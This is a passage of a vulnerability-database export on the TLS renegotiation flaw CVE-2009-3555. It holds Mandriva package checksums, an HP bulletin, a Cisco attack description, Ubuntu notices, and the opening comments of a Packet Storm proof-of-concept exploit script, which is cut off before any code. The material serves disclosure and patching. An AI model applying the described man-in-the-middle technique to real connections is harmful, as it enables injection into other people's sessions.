corporate/3.0/x86_64/apache2-manual-2.0.48-6.24.C30mdk.x86_64.rpm\r\n b08953bf8a87cbee0241d847e6cbb6a6 \r\ncorporate/3.0/x86_64/apache2-mod_cache-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 1a5ad78b7315a7a6bfa05db7438c6eda corporate/3.0/x86_64/apache2-mod_dav-2.0.48-6.24.C30mdk.x86_64.rpm\r\n a636014239d93572e2a91ee866ae3f82 \r\ncorporate/3.0/x86_64/apache2-mod_deflate-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 9adcf4378314a767e696654b3331b457 \r\ncorporate/3.0/x86_64/apache2-mod_disk_cache-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 49ef3af0b106e5eec7fe3005fb81b5d4 \r\ncorporate/3.0/x86_64/apache2-mod_file_cache-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 958dffea2073203c81f20b9f0bea9482 \r\ncorporate/3.0/x86_64/apache2-mod_ldap-2.0.48-6.24.C30mdk.x86_64.rpm\r\n a9e65314e2fd6e892509e0da10f6eeb0 \r\ncorporate/3.0/x86_64/apache2-mod_mem_cache-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 1868d43b584b33eecf05d34e9cf3fb4c \r\ncorporate/3.0/x86_64/apache2-mod_proxy-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 5be056de8b78c46a8c92215dbd5f227e corporate/3.0/x86_64/apache2-mod_ssl-2.0.48-6.24.C30mdk.x86_64.rpm\r\n e7afdce1e4b9e73f8798a7ac1651b896 corporate/3.0/x86_64/apache2-modules-2.0.48-6.24.C30mdk.x86_64.rpm\r\n af0468764dd4b41a504a767bc83cb6e0 corporate/3.0/x86_64/apache2-source-2.0.48-6.24.C30mdk.x86_64.rpm\r\n ca4b564d5e3bf167a6aa1f9ed2b4d87a corporate/3.0/x86_64/lib64apr0-2.0.48-6.24.C30mdk.x86_64.rpm \r\n 63e2249a390c150ab253ad9b22c3be11 corporate/3.0/SRPMS/apache2-2.0.48-6.24.C30mdk.src.rpm\r\n\r\n Corporate 4.0:\r\n d07e89c7290315f70eac762e5b18c87a corporate/4.0/i586/apache-base-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 024922fdd74e02987c974574bee16142 corporate/4.0/i586/apache-devel-2.2.3-1.9.20060mlcs4.i586.rpm\r\n a6f56a8099acac3eed1a5795b319894b \r\ncorporate/4.0/i586/apache-htcacheclean-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 04013648d7252ff8280b8a0bd0bc54d8 \r\ncorporate/4.0/i586/apache-mod_authn_dbd-2.2.3-1.9.20060mlcs4.i586.rpm\r\n bbe1270f753acfcadd609f0f5271ab59 corporate/4.0/i586/apache-mod_cache-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 8e39e175d01ba601cc8f4a89aa0aafe8 corporate/4.0/i586/apache-mod_dav-2.2.3-1.9.20060mlcs4.i586.rpm\r\n c624f40ca8a6e17396aa6c8b0e87316a corporate/4.0/i586/apache-mod_dbd-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 48507ca50019f15557211e7208917442 \r\ncorporate/4.0/i586/apache-mod_deflate-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 0c35cb63bff80d6a374dc1bb638c293d \r\ncorporate/4.0/i586/apache-mod_disk_cache-2.2.3-1.9.20060mlcs4.i586.rpm\r\n e54a0df2e42964146494087a713c88d7 \r\ncorporate/4.0/i586/apache-mod_file_cache-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 6671114f02a3f484499ea8c374e8490a corporate/4.0/i586/apache-mod_ldap-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 9a9c1bea5eec317c217d696d72569e6e \r\ncorporate/4.0/i586/apache-mod_mem_cache-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 23f6363a3bf7833d2b96a3297e4a564f corporate/4.0/i586/apache-mod_proxy-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 3b9415f481e7a22a5198028ae959a5dd \r\ncorporate/4.0/i586/apache-mod_proxy_ajp-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 86554d7f517fce317019f67fd75259ad corporate/4.0/i586/apache-mod_ssl-2.2.3-1.9.20060mlcs4.i586.rpm\r\n e3e5dc6310d7bf1d4d2044b1725a9d48 corporate/4.0/i586/apache-modules-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 2fd54535f742c7717965f9724d2d01f0 \r\ncorporate/4.0/i586/apache-mod_userdir-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 632c40b46876d9b703ad23eced906f78 \r\ncorporate/4.0/i586/apache-mpm-prefork-2.2.3-1.9.20060mlcs4.i586.rpm\r\n e30e11806815fb176b3c803c5019f177 corporate/4.0/i586/apache-mpm-worker-2.2.3-1.9.20060mlcs4.i586.rpm\r\n b5a512cf0d830276bee061adc68865c6 corporate/4.0/i586/apache-source-2.2.3-1.9.20060mlcs4.i586.rpm \r\n 130effba39f8a908caf0cd50bc21032b corporate/4.0/SRPMS/apache-2.2.3-1.9.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n ecc2a3bd8e40259f3abe8b919be7c19e corporate/4.0/x86_64/apache-base-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 15fbe828c013d9e6f057429316e52b4f corporate/4.0/x86_64/apache-devel-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 35200d719d37cce3340a3340ed8844f0 \r\ncorporate/4.0/x86_64/apache-htcacheclean-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 9557096c0aaa1654b01a702aaec9cfdc \r\ncorporate/4.0/x86_64/apache-mod_authn_dbd-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 360db7ff5aeb5fb4d50965ff46cf33c2 \r\ncorporate/4.0/x86_64/apache-mod_cache-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n fc3466f85615fe8c101c378cf708925e \r\ncorporate/4.0/x86_64/apache-mod_dav-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 36c78f40285a12e4435cdc3f50760e98 \r\ncorporate/4.0/x86_64/apache-mod_dbd-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n af76befa20d16f23e2ca3cdb058a6556 \r\ncorporate/4.0/x86_64/apache-mod_deflate-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 1c150757dbf06246e7410267e56bc874 \r\ncorporate/4.0/x86_64/apache-mod_disk_cache-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 3a4209a8308aeeddbf85013373e24fe8 \r\ncorporate/4.0/x86_64/apache-mod_file_cache-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n bf2d893217e5394b69d6cedb35ba9fcd \r\ncorporate/4.0/x86_64/apache-mod_ldap-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n bab8c9e7147958bda7d19884a1f79828 \r\ncorporate/4.0/x86_64/apache-mod_mem_cache-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n b8b59cf82195b1525939ae6b2c8d6f74 \r\ncorporate/4.0/x86_64/apache-mod_proxy-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 982465827884b85213e668abc230f614 \r\ncorporate/4.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n d9a259ad81f55eabf8a41444f65a5e88 \r\ncorporate/4.0/x86_64/apache-mod_ssl-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 3745511966963a96653d60c083e20557 \r\ncorporate/4.0/x86_64/apache-modules-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n f715e52fc3c12cc00bdce10f7d51b393 \r\ncorporate/4.0/x86_64/apache-mod_userdir-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n e475591ac7db24d778cea1aa9aac4273 \r\ncorporate/4.0/x86_64/apache-mpm-prefork-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 3033b599c0c128f6db7d86563f4ae8a8 \r\ncorporate/4.0/x86_64/apache-mpm-worker-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n d80783acdafdac78524ce398c49d9109 \r\ncorporate/4.0/x86_64/apache-source-2.2.3-1.9.20060mlcs4.x86_64.rpm \r\n 130effba39f8a908caf0cd50bc21032b corporate/4.0/SRPMS/apache-2.2.3-1.9.20060mlcs4.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n 5cbfefa0f9325fa6f9ef005f07a6b8b8 mes5/i586/apache-base-2.2.9-12.5mdvmes5.i586.rpm\r\n 88d57fd2e10472f88f140ff8d55dbc38 mes5/i586/apache-devel-2.2.9-12.5mdvmes5.i586.rpm\r\n aa0a36e0aced2ca4547b2bc110b6ef4d mes5/i586/apache-htcacheclean-2.2.9-12.5mdvmes5.i586.rpm\r\n ab53720093285644b4ac28acf4da4691 mes5/i586/apache-mod_authn_dbd-2.2.9-12.5mdvmes5.i586.rpm\r\n 3f77dbc75bdd7ee21f29b441c6e521ed mes5/i586/apache-mod_cache-2.2.9-12.5mdvmes5.i586.rpm\r\n a4bf3ff6e987fe3343af8434757a88a7 mes5/i586/apache-mod_dav-2.2.9-12.5mdvmes5.i586.rpm\r\n 05ff14c67e71e4b64afa718ac6ba3546 mes5/i586/apache-mod_dbd-2.2.9-12.5mdvmes5.i586.rpm\r\n da8d3fe9b8273ac43b6bfc1f34863fde mes5/i586/apache-mod_deflate-2.2.9-12.5mdvmes5.i586.rpm\r\n 97244389ee38b5de47643effc489204a mes5/i586/apache-mod_disk_cache-2.2.9-12.5mdvmes5.i586.rpm\r\n d5978571771f84149dffc6190a3e8ea3 mes5/i586/apache-mod_file_cache-2.2.9-12.5mdvmes5.i586.rpm\r\n 463698779bc7b8bbfdb06160ee8338c0 mes5/i586/apache-mod_ldap-2.2.9-12.5mdvmes5.i586.rpm\r\n 75e208ff4c965cb9562d71b0c3f3b54b mes5/i586/apache-mod_mem_cache-2.2.9-12.5mdvmes5.i586.rpm\r\n 258387abdac4af540702af7a3ddc369f mes5/i586/apache-mod_proxy-2.2.9-12.5mdvmes5.i586.rpm\r\n d34347687b1487625db8f33ac1c9bf0a mes5/i586/apache-mod_proxy_ajp-2.2.9-12.5mdvmes5.i586.rpm\r\n 250b156963ece2dc2f9fdac651f6a395 mes5/i586/apache-mod_ssl-2.2.9-12.5mdvmes5.i586.rpm\r\n d21faefa501bb2e5f5858476e02c1226 mes5/i586/apache-modules-2.2.9-12.5mdvmes5.i586.rpm\r\n 0f28dbb179b145765fe5ed88ceb8ec74 mes5/i586/apache-mod_userdir-2.2.9-12.5mdvmes5.i586.rpm\r\n bfa565b70c216c8768a2feb891cc2603 mes5/i586/apache-mpm-event-2.2.9-12.5mdvmes5.i586.rpm\r\n 5a283fab88631fddb90ed198a0e013f7 mes5/i586/apache-mpm-itk-2.2.9-12.5mdvmes5.i586.rpm\r\n d1f025db329f45b590decda1dd39f139 mes5/i586/apache-mpm-peruser-2.2.9-12.5mdvmes5.i586.rpm\r\n 831118fd77a0867e1648bf7b81d3dc21 mes5/i586/apache-mpm-prefork-2.2.9-12.5mdvmes5.i586.rpm\r\n 2e40c5744eca10bcee1994265bfa0add mes5/i586/apache-mpm-worker-2.2.9-12.5mdvmes5.i586.rpm\r\n 384f3506ca34228b8608333366c06567 mes5/i586/apache-source-2.2.9-12.5mdvmes5.i586.rpm \r\n cc6d4768770054f71e7863e59e82d7d2 mes5/SRPMS/apache-2.2.9-12.5mdvmes5.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n 042689e5830432c43d311f5852c8a6b9 mes5/x86_64/apache-base-2.2.9-12.5mdvmes5.x86_64.rpm\r\n e8ef5d5e9b50211446abb3bdce89490e mes5/x86_64/apache-devel-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 1feb03240bdd0062a74e144019e65627 mes5/x86_64/apache-htcacheclean-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 53490db1804ebfe8f37e0c5583ff199f mes5/x86_64/apache-mod_authn_dbd-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 57e1c45e2bd8e9c9cd2863a4a75a655f mes5/x86_64/apache-mod_cache-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 896de3fbd0e0e39f97c46f9b97689076 mes5/x86_64/apache-mod_dav-2.2.9-12.5mdvmes5.x86_64.rpm\r\n c3753326915c49a65d6b2dfe591bc417 mes5/x86_64/apache-mod_dbd-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 8213cf826f9b91a97d7ff9211c66580a mes5/x86_64/apache-mod_deflate-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 01ba45d05dc6c0760b39f1292c44a898 mes5/x86_64/apache-mod_disk_cache-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 8d1b82025dce6cd6e58d64fb55f5f924 mes5/x86_64/apache-mod_file_cache-2.2.9-12.5mdvmes5.x86_64.rpm\r\n d7b2408e8084272e00b42ac6239c8093 mes5/x86_64/apache-mod_ldap-2.2.9-12.5mdvmes5.x86_64.rpm\r\n c062d0ff490d24df2de15d863a13d471 mes5/x86_64/apache-mod_mem_cache-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 38ef66a65a44187ca6a07bb02f96a8c0 mes5/x86_64/apache-mod_proxy-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 408e4b205660e653dfc352ef2ec1fcab mes5/x86_64/apache-mod_proxy_ajp-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 65f377cb8cf3d4179f94ff11b274f857 mes5/x86_64/apache-mod_ssl-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 97bd5c4da3618a8732ae533fa7486f5e mes5/x86_64/apache-modules-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 5ddfd8c440d9e9276eb3ce6fb1e06bcb mes5/x86_64/apache-mod_userdir-2.2.9-12.5mdvmes5.x86_64.rpm\r\n e91ef205af8b8aaca58b941f11a38d04 mes5/x86_64/apache-mpm-event-2.2.9-12.5mdvmes5.x86_64.rpm\r\n d565fc890d268b77fe4de543bf00be40 mes5/x86_64/apache-mpm-itk-2.2.9-12.5mdvmes5.x86_64.rpm\r\n ba4ff5181db66fd6759a4a0d43e2e4dd mes5/x86_64/apache-mpm-peruser-2.2.9-12.5mdvmes5.x86_64.rpm\r\n a9b109a311a1750adafefe3fa20ed68e mes5/x86_64/apache-mpm-prefork-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 2860b00556bc4c55a240ceb4f69043fb mes5/x86_64/apache-mpm-worker-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 65fc889e99eb01a8c7abb77258ef078f mes5/x86_64/apache-source-2.2.9-12.5mdvmes5.x86_64.rpm \r\n cc6d4768770054f71e7863e59e82d7d2 mes5/SRPMS/apache-2.2.9-12.5mdvmes5.src.rpm\r\n\r\n Multi Network Firewall 2.0:\r\n 445117a109396af9413dca2a69f01a0a mnf/2.0/i586/apache2-2.0.48-6.24.C30mdk.i586.rpm\r\n 30176ca39c3d65c2e50cf4c4d192dfa2 mnf/2.0/i586/apache2-common-2.0.48-6.24.C30mdk.i586.rpm\r\n 96b47f57ba9fb077da6cf27bc21e7a76 mnf/2.0/i586/apache2-devel-2.0.48-6.24.C30mdk.i586.rpm\r\n ee2e1c41ed579312e9f6365af1f475b3 mnf/2.0/i586/apache2-manual-2.0.48-6.24.C30mdk.i586.rpm\r\n 06ce15a998c23ec835a81a061455249a mnf/2.0/i586/apache2-mod_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 7abe5081d5d991b09a8484f41aeadba5 mnf/2.0/i586/apache2-mod_dav-2.0.48-6.24.C30mdk.i586.rpm\r\n 73516b134aed9853067ab93fe830513b mnf/2.0/i586/apache2-mod_deflate-2.0.48-6.24.C30mdk.i586.rpm\r\n 0d98687a38a7a9806030d8514fe9e0bc mnf/2.0/i586/apache2-mod_disk_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 8be5990f31ccf58eb110efb0c45487b7 mnf/2.0/i586/apache2-mod_file_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 4ddd2e15e616715ea577e1b1b010da39 mnf/2.0/i586/apache2-mod_ldap-2.0.48-6.24.C30mdk.i586.rpm\r\n bccdb965684cd1e24d054f7febc096ff mnf/2.0/i586/apache2-mod_mem_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 345e5038a9390a07a62d39da825df65d mnf/2.0/i586/apache2-mod_proxy-2.0.48-6.24.C30mdk.i586.rpm\r\n a3e4dc57677b0728ae7c87a4a0cd4e68 mnf/2.0/i586/apache2-mod_ssl-2.0.48-6.24.C30mdk.i586.rpm\r\n c5c5fde933d0a30744a18e8fbdc677f5 mnf/2.0/i586/apache2-modules-2.0.48-6.24.C30mdk.i586.rpm\r\n da00919dd82d8db9b7fb4a63c6b44965 mnf/2.0/i586/apache2-source-2.0.48-6.24.C30mdk.i586.rpm\r\n 036643a921387b88380a3f913865ec5f mnf/2.0/i586/libapr0-2.0.48-6.24.C30mdk.i586.rpm \r\n 63e2249a390c150ab253ad9b22c3be11 mnf/2.0/SRPMS/apache2-2.0.48-6.24.C30mdk.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFK9wgKmqjQ0CJFipgRAuxlAJ9Nb9gIPz9aFR19dx/k7386s7uQCQCg8k3E\r\nHCb1+1oDp434m6raw3FK1hw=\r\n=9V9Z\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-11-09T00:00:00", "published": "2009-11-09T00:00:00", "id": "SECURITYVULNS:DOC:22763", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22763", "title": "[ MDVSA-2009:295 ] apache", "type": "securityvulns", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02171256\r\nVersion: 1\r\n\r\nHPSBMA02534 SSRT090180 rev.1 - HP System Management Homepage &#40;SMH&#41; for Linux and Windows, Remote Unauthorized Information Disclosure, Unauthorized Data Modification,\r\nDenial of Service &#40;DoS&#41;\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2010-05-17\r\nLast Updated: 2010-05-17\r\n\r\nPotential Security Impact: Remote unauthorized information disclosure, unauthorized data modification, Denial of Service &#40;DoS&#41;\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP System Management Homepage &#40;SMH&#41; for Linux and Windows. These vulnerabilities could be exploited\r\nremotely to allow unauthorized information disclosure, unauthorized data modification, Denial of Service &#40;DoS&#41;\r\n\r\nReferences: CVE-2009-3555\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nHP System Management Homepage for Windows all versions prior to 6.1\r\nHP System Management Homepage for Linux &#40;x86&#41; all versions prior to 6.1\r\nHP System Management Homepage for Linux &#40;AMD64/EM64T&#41; all versions prior to 6.1\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2009-3555 &#40;AV:N/AC:L/Au:N/C:N/I:P/A:P&#41; 6.4\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided the following software updates to resolve the vulnerabilities.\r\n\r\nHP System Management Homepage for Windows v6.1.0.102 &#40;or subsequent&#41;\r\n\r\nHP System Management Homepage for Linux &#40;x86&#41; v6.1.0-103 &#40;or subsequent&#41;\r\n\r\nHP System Management Homepage for Linux &#40;AMD64/EM64T&#41; v6.1.0-103 &#40;or subsequent&#41;\r\n\r\nDownloads are available from the following locations:\r\n\r\nHP System Management Homepage v6.1.0.102 for Windows can be downloaded from\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/SoftwareDescription.jsp?swItem=MTX-1b189d95582249b58d9ca94c45\r\n\r\nHP System Management Homepage for Linux &#40;x86&#41;, v6.1.0-103 for Linux X86 OS can be downloaded from\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/SoftwareDescription.jsp?swItem=MTX-4311cc1b61fd42a4874b13d714\r\n\r\nHP System Management Homepage for Linux &#40;AMD64/EM64T&#41;, v6.1.0-103 for Linux 64-bit OS can be downloaded from\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/SoftwareDescription.jsp?swItem=MTX-6a3f2fa832db4ddf9b3398f04c\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\nNone\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 17 May 2010 Initial Release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the\r\ncustomer&#39;s patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&amp;langcode=USENG&amp;jumpid=in_SC-GEN__driverITRC&amp;topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber&#39;s choice for Business: sign-in.\r\nOn the web page: Subscriber&#39;s Choice: your profile summary - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing &amp; Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of\r\nsoftware products to provide customers with current secure solutions.\r\n\r\n&quot;HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained\r\nin this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not\r\nwarrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from\r\nuser&#39;s use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including\r\nthe warranties of merchantability and fitness for a particular purpose, title and non-infringement.&quot;\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided &quot;as is&quot; without\r\nwarranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential\r\ndamages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software\r\nrestoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein\r\nare trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their\r\nrespective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAkvxXlUACgkQ4B86/C0qfVnKZgCgog6G7LtDW9sT9xWkQ/ZKh63K\r\nkzQAoIsnJB8qTVzk1BtpDhpFShAxQQqF\r\n=Gnhw\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2010-05-20T00:00:00", "published": "2010-05-20T00:00:00", "id": "SECURITYVULNS:DOC:23890", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23890", "title": "[security bulletin] HPSBMA02534 SSRT090180 rev.1 - HP System Management Homepage &#40;SMH&#41; for Linux and Windows, Remote Unauthorized Information Disclosure, Unauthorized Data Modification, Denial of Service &#40;DoS&#41;", "type": "securityvulns", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "cisco": [{"lastseen": "2020-12-24T11:42:04", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": "Multiple Transport Layer Security (TLS) implementations contain a vulnerability when renegotiating a TLS session that could allow an unauthenticated, remote attacker to conduct a man-in-the-middle attack.\n\nThe vulnerability exists during a TLS renegotiation process. If an attacker can intercept traffic from a client to a TLS server, the attacker could stage a rogue TLS server to intercept that traffic and appear to authenticate the client to what the client thinks is the desired TLS server. The attacker is then able to authenticate to the legitimate TLS server and thus stage a man-in-the-middle attack. However, the attacker would not be able to view the contents of the session and would only be able to inject data or requests into it.\n\nProof-of-concept code that exploits this vulnerability is publicly available.\n\nOpenSSL has confirmed this vulnerability in a changelog and released updated software.\n\nTo exploit this vulnerability, the attacker must be able to intercept traffic from a TLS client to a TLS server. In many cases, this may require the attacker to have access to a network that is adjacent to the targeted user's system. Another possibility would be for the attacker to have access to a network that is adjacent to a legitimate TLS server.\n\nThis vulnerability is likely to affect multiple implementations of TLS.", "modified": "2012-08-14T16:24:54", "published": "2009-11-05T19:53:52", "id": "CISCO-SA-20091105-CVE-2009-3555", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20091105-CVE-2009-3555", "type": "cisco", "title": "Transport Layer Security Renegotiation Remote Man-in-the-Middle Attack Vulnerability", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-09T01:31:52", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "USN-927-1 fixed vulnerabilities in nss in Ubuntu 9.10. This update provides \nthe corresponding updates for Ubuntu 8.04 LTS.\n\nOriginal advisory details:\n\nMarsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 \nprotocols. If an attacker could perform a man in the middle attack at the \nstart of a TLS connection, the attacker could inject arbitrary content at \nthe beginning of the user's session. This update adds support for the new \nnew renegotiation extension and will use it when the server supports it.", "edition": 5, "modified": "2010-06-29T00:00:00", "published": "2010-06-29T00:00:00", "id": "USN-927-4", "href": "https://ubuntu.com/security/notices/USN-927-4", "title": "nss vulnerability", "type": "ubuntu", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-07-09T01:31:24", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "USN-927-4 fixed vulnerabilities in NSS. This update provides the NSPR \nneeded to use the new NSS.\n\nOriginal advisory details:\n\nMarsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 \nprotocols. If an attacker could perform a man in the middle attack at the \nstart of a TLS connection, the attacker could inject arbitrary content at \nthe beginning of the user's session. This update adds support for the new \nnew renegotiation extension and will use it when the server supports it.", "edition": 15, "modified": "2010-06-29T00:00:00", "published": "2010-06-29T00:00:00", "id": "USN-927-5", "href": "https://ubuntu.com/security/notices/USN-927-5", "title": "nspr update", "type": "ubuntu", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:34", "description": "", "published": "2009-12-21T00:00:00", "type": "packetstorm", "title": "TLS Renegotiation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3555"], "modified": "2009-12-21T00:00:00", "id": "PACKETSTORM:84112", "href": "https://packetstormsecurity.com/files/84112/TLS-Renegotiation-Exploit.html", "sourceData": "`#!/usr/bin/env python \n \n###################################### \n# # \n# RedTeam Pentesting GmbH # \n# kontakt@redteam-pentesting.de # \n# http://www.redteam-pentesting.de # \n# # \n###################################### \n \n# PoC exploit for the TLS renegotiation vulnerability (CVE-2009-3555) \n \n# License \n# ------- \n# CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/ \n \n# Timeline \n# -------- \n# 2009-12-21 initial public release \n \n# Known Issues \n# ------------ \n# Firefox: if it fails connecting to a TLS site too often, falls back to \n# issuing SSLv2 ClientHello only until browser is restarted \n# \n# wget: attempts SSLv2 ClientHello by default \n \n# References \n# ---------- 